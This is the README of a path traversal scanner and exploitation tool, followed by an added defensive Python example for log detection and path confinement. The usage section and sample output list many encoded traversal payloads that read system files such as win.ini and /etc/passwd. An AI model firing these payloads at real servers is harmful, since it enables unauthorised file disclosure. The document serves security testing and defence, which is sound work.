dotdotfarm

Utility for detection & exploitation of Path Traversal vulnerabilities in various network services

dotdotweb - PT tool for HTTP services

The tools are written in Python and use asynchronous requests (aiohttp) together with some acceleration techniques, which allows up to ~3K requests per second.

Features

  • asynchronous requests to speed up scanning of the target
  • fetching file contents once a payload succeeds
  • placing the payload in any part of the request (URL, headers or POST data)
  • callbacks for handling results

Installation

Install from PyPi

pip install dotdotfarm

You can also install it directly from GitHub repository

git clone https://github.com/treddis/dotdotfarm.git
cd dotdotfarm
pip3 install .

To upgrade the tool, run

pip install --upgrade dotdotfarm

Usage


    .___      __      .___      __    _____                      
  __| _/_____/  |_  __| _/_____/  |__/ ____\____ _______  _____  
 / __ |/  _ \   __\/ __ |/  _ \   __\   __\\__  \\_  __ \/     \ 
/ /_/ (  <_> )  | / /_/ (  <_> )  |  |  |   / __ \|  | \/  Y Y  \
\____ |\____/|__| \____ |\____/|__|  |__|  (____  /__|  |__|_|  /
     \/                \/                       \/            \/ 
     
usage: dotdotweb [-h] [--version] [-V] [-A] [-R] [-o {windows,linux}]
                 [-d DEPTH] [-f FILE] [--delay DELAY]
                 [-t TIMEOUT] [-fs FS] [-fc FC] [--header HEADERS] [--data DATA]
                 url

fast path traversal identificator & exploit

positional arguments:
  url                   target URL

options:
  -h, --help            show this help message and exit
  --version             print version of the tool
  -V, --validate        validate files' content after successfull exploitation
                            (default false)
  -A, --all             try all files after successfull exploitation
                            (default false)
  -R, --print-files     read traversed files (default false)
  -o {windows,linux}, --os-type {windows,linux}
                        target OS type (default all)
  -d DEPTH, --depth DEPTH
                        depth of PT searching (default 5)
  -f FILE, --file FILE  specific file for PT detection
  --delay DELAY         make delays between requests in milliseconds (default 0)
  -t TIMEOUT, --timeout TIMEOUT
                        timeout of connections (default 60)
  -fs FS                filter output by size
  -fc FC                filter output by response code
  --header HEADERS      custom header for requests
  --data DATA           specify POST data

Passing payload in GET parameters

Passing the payload through ?par=val query pairs (the FUZZ marker is replaced by each payload):

dotdotweb -o windows -fc 500 \
          "http://someserver.com:1280/newpath?testparameter=FUZZ&secondparameter=somevalue"

Passing payload in headers

Passing the payload inside a request header (for example Origin: master=FUZZ), using the --header option:

dotdotweb -o linux -fc 500,404 --header "Referer: https://www.google.com/path?q=FUZZ" \
          "http://someserver.com:1280/newpath?testparameter=firstvalue&secondparameter=somevalue"

Passing payload in POST data

Passing the payload through POST data parameters, using the --data option (note that -d is the depth option):

dotdotweb -o linux -fc 500 -fs 111 --data "key0=val0&key1=FUZZ" \
          "http://someserver.com:1280/newpath?testparameter=firstvalue&secondparameter=somevalue"

Using regexp to filter responses

Pass -fs (filter by size) or -fc (filter by status code) to filter out unrelated responses; both accept comma-separated glob patterns:

dotdotweb -fc 50*,4* -fs 18??,1834* http://someserver.com:1234/testpath/FUZZ

Launch callbacks on responses

You can launch callbacks on your responses to perform a check or take other actions. The following callbacks are built in:

  • validate response content with a regexp and print the matches (-V); you can supply your own regexp as well
  • keep trying all payloads even after an entry point has been found (-A)
  • read the content of traversed files and print it on screen (-R)

Example output

dotdotweb -o windows "http://localhost:8080/pathtrav?query=FUZZ" 

    .___      __      .___      __    _____
  __| _/_____/  |_  __| _/_____/  |__/ ____\____ _______  _____
 / __ |/  _ \   __\/ __ |/  _ \   __\   __\\__  \\_  __ \/     \
/ /_/ (  <_> )  | / /_/ (  <_> )  |  |  |   / __ \|  | \/  Y Y  \
\____ |\____/|__| \____ |\____/|__|  |__|  (____  /__|  |__|_|  /
     \/                \/                       \/            \/

[*] Started at Sun Jan 22 19:32:46 2023
 ../../../Windows/win.ini                                                   [Status: 200, Size: 111]
 ../Windows/win.ini                                                         [Status: 200, Size: 111]
 ..\Windows\win.ini                                                         [Status: 200, Size: 111]
 ..%2fWindows%2fwin.ini                                                     [Status: 200, Size: 111]
 ..\..\..\Windows\win.ini                                                   [Status: 200, Size: 111]
 ..%5c..%5c..%5cWindows%5cwin.ini                                           [Status: 200, Size: 111]
 ..%5cWindows%5cwin.ini                                                     [Status: 200, Size: 111]
 .%2e/Windows/win.ini                                                       [Status: 200, Size: 111]
 .%2e\Windows\win.ini                                                       [Status: 200, Size: 111]
 .%2e%2fWindows%2fwin.ini                                                   [Status: 200, Size: 111]
 .%2e%5cWindows%5cwin.ini                                                   [Status: 200, Size: 111]
 %5C..%5cWindows%5cwin.ini                                                  [Status: 200, Size: 111]
 f%5C..%2fWindows%2fwin.ini                                                 [Status: 200, Size: 111]
 %5C../Windows/win.ini                                                      [Status: 200, Size: 111]
 %5C..\%5C..\%5C..\Windows\win.ini                                          [Status: 200, Size: 111]
 .%2e\.%2e\.%2e\Windows\win.ini                                             [Status: 200, Size: 111]
 .%2e%5c.%2e%5c.%2e%5cWindows%5cwin.ini                                     [Status: 200, Size: 111]
 %5C..%2f%5C..%2f%5C..%2fWindows%2fwin.ini                                  [Status: 200, Size: 111]
 %5C../%5C../%5C../Windows/win.ini                                          [Status: 200, Size: 111]
 %5C..%5c%5C..%5c%5C..%5cWindows%5cwin.ini                                  [Status: 200, Size: 111]
 %2e./Windows/win.ini                                                       [Status: 200, Size: 111]
 %2e./%2e./%2e./Windows/win.ini                                             [Status: 200, Size: 111]
 %2e.%5cWindows%5cwin.ini                                                   [Status: 200, Size: 111]
 %2e.%5c%2e.%5c%2e.%5cWindows%5cwin.ini                                     [Status: 200, Size: 111]
 .%2e%2f.%2e%2f.%2e%2fWindows%2fwin.ini                                     [Status: 200, Size: 111]
100%|██████████████████████████████████████████████████████████| 6960/6960 [00:12<00:00, 575.63it/s]
[*] Ended at Sun Jan 22 19:32:58 2023 (11 seconds)
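The output above lists the encoding variants the scanner tries: percent-encoded slashes (..%2f), backslashes (..%5c, ..\), split dots (.%2e, %2e.) and leading %5C. From the defending side, the useful lesson is that every one of these collapses to a plain ".." segment once the path is decoded and separators are unified. The following is an added example (not part of dotdotfarm) showing how to normalise such requests, flag traversal attempts in access logs, and lexically confine a user-supplied path to a document root. The log lines, hosts and the /var/www/files root are constructed for the example.

```python
"""Detection and containment checks for path-traversal payloads.

Added example, not part of dotdotfarm. Demonstrates (a) normalising the
encodings the scanner output uses and flagging attempts in access logs, and
(b) lexically confining a user-supplied relative path to a document root.
"""
import posixpath
import re
from typing import List, Optional
from urllib.parse import unquote

# Constructed access-log lines (Common Log Format). The request paths reuse
# encodings of the kind the scanner output lists; hosts/timestamps are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [22/Jan/2023:19:32:46 +0000] "GET /pathtrav?query=..%2f..%2f..%2fWindows%2fwin.ini HTTP/1.1" 200 111
10.0.0.5 - - [22/Jan/2023:19:32:46 +0000] "GET /pathtrav?query=.%2e%5c.%2e%5cWindows%5cwin.ini HTTP/1.1" 200 111
10.0.0.5 - - [22/Jan/2023:19:32:47 +0000] "GET /pathtrav?query=%252e%252e%252fetc%252fpasswd HTTP/1.1" 500 0
10.0.0.7 - - [22/Jan/2023:19:33:01 +0000] "GET /pathtrav?query=reports%2F2023%2Fsummary.txt HTTP/1.1" 200 4096
10.0.0.7 - - [22/Jan/2023:19:33:02 +0000] "POST /upload HTTP/1.1" 201 0
"""

REQUEST_RE = re.compile(r'"(?:GET|POST|PUT|DELETE|HEAD) (\S+) HTTP/')
# Split on path separators and on query delimiters, because the scanner
# injects its payload into parameter values, not only into the path.
SEGMENT_SPLIT = re.compile(r"[/?&=]")


def normalize(raw: str, max_rounds: int = 3) -> str:
    """Percent-decode until the string stops changing (catches double
    encoding such as %252e), then fold backslashes into forward slashes so
    '..\\', '..%5c' and '..%2f' all look like '../'."""
    text = raw
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text.replace("\\", "/")


def has_dotdot_segment(raw: str) -> bool:
    """True when some delimited segment is '..' after normalisation.
    This flags the attempt itself, whether or not it would escape the root."""
    return any(seg == ".." for seg in SEGMENT_SPLIT.split(normalize(raw)))


def flag_traversal_requests(log_text: str) -> List[str]:
    """Return the request targets (path + query) from the log whose decoded
    form contains a '..' segment."""
    flagged = []
    for line in log_text.splitlines():
        match = REQUEST_RE.search(line)
        if match and has_dotdot_segment(match.group(1)):
            flagged.append(match.group(1))
    return flagged


def confine_to_root(root: str, user_path: str) -> Optional[str]:
    """Lexically resolve user_path under root and return the resolved path,
    or None if it would leave root (absolute paths are rejected as well,
    since posixpath.join discards root for them). Purely string-based so it
    runs offline; on a real filesystem also apply os.path.realpath so that
    symlinks cannot re-open the door."""
    root = posixpath.normpath(root)
    candidate = posixpath.normpath(posixpath.join(root, normalize(user_path)))
    if candidate == root or candidate.startswith(root + "/"):
        return candidate
    return None


if __name__ == "__main__":
    for target in flag_traversal_requests(SAMPLE_LOG):
        print("traversal attempt:", target)
    for p in ("../../../Windows/win.ini", "f%5C..%2fWindows%2fwin.ini",
              "reports/2023/summary.txt"):
        print(p, "->", confine_to_root("/var/www/files", p))
```

Note the difference between the two checks on a payload such as f%5C..%2fWindows%2fwin.ini: has_dotdot_segment flags it as an attempt (worth alerting on), while confine_to_root resolves it to a location inside the root and would still serve it. Detection and containment are separate controls and both belong in the pipeline.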
